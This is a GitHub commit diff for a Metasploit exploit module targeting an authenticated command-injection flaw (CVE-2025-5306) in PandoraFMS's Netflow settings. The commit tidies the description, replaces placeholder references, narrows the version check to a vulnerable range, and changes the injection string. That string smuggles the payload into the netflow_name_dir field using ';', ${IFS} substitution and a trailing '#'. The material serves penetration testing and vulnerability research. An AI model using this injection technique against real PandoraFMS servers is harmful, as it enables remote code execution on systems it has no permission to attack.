Skip to content

Commit af4cd2a

Browse files
committed
Addresses comments, fixes check method
1 parent 37e8780 commit af4cd2a

File tree

1 file changed

+5
-9
lines changed

1 file changed

+5
-9
lines changed

modules/exploits/linux/http/pandora_fms_auth_netflow_rce.rb

Lines changed: 5 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -16,15 +16,12 @@ def initialize(info = {})
1616
info,
1717
'Name' => 'PandoraFMS Netflow Authenticated Remote Code Execution',
1818
'Description' => %q{
19-
This module exploits a command injection vulnerability in Netflow component of PandoraFMS. The module requires set of user credentials to modify Netflow settings. Also, Netflow binaries have to present on the system.
19+
This module exploits a command injection vulnerability in Netflow component of PandoraFMS. The module requires a set of user credentials to modify Netflow settings. Also, Netflow binaries have to present on the system.
2020
},
2121
'License' => MSF_LICENSE,
2222
'Author' => ['msutovsky-r7'], # researcher, module dev
2323
'References' => [
24-
[ 'OSVDB', '12345' ],
25-
[ 'EDB', '12345' ],
26-
[ 'URL', 'http://www.example.com'],
27-
[ 'CVE', '1978-1234']
24+
[ 'CVE', '2025-5306']
2825
],
2926
'Platform' => ['unix', 'linux'],
3027
'Arch' => [ ARCH_CMD ],
@@ -88,9 +85,9 @@ def check
8885

8986
vprint_status("Version #{version} detected")
9087

91-
return Exploit::CheckCode::Vulnerable("Vulnerable PandoraFMS version #{version} detected") unless Rex::Version.new(version) < Rex::Version.new('7.0.777.10')
88+
return Exploit::CheckCode::Vulnerable("Vulnerable PandoraFMS version #{version} detected") if Rex::Version.new(version).between?(Rex::Version.new('7.0.774'), Rex::Version.new('7.0.777.10'))
9289

93-
Msf::Exploit::CheckCode::Safe('Running version is not vulnerable')
90+
Msf::Exploit::CheckCode::Safe("Running version #{version}, which is not vulnerable")
9491
end
9592

9693
def get_csrf_token
@@ -105,7 +102,6 @@ def get_csrf_token
105102
html = res.get_html_document
106103

107104
fail_with Failure::UnexpectedReply, 'Empty response received' unless html
108-
html.at('div[@id="ver_num"]')&.text
109105

110106
@csrf_token = html.at('input[@id="hidden-csrf_code"]')&.attributes&.fetch('value', nil)
111107

@@ -158,7 +154,7 @@ def configure_netflow
158154
'vars_get' => { 'sec' => 'general', 'sec2' => 'godmode/setup/setup', 'section' => 'net' },
159155
'vars_post' =>
160156
{
161-
'netflow_name_dir' => ';' + payload.encoded.gsub(' ', '${IFS}') + '#;',
157+
'netflow_name_dir' => ';' + payload.encoded.gsub(' ', '${IFS}') + '#',
162158
'netflow_daemon' => netflow_daemon_value,
163159
'netflow_nfdump' => netflow_nfdump_value,
164160
'netflow_max_resolution' => netflow_max_resolution_value,

0 commit comments

Comments
 (0)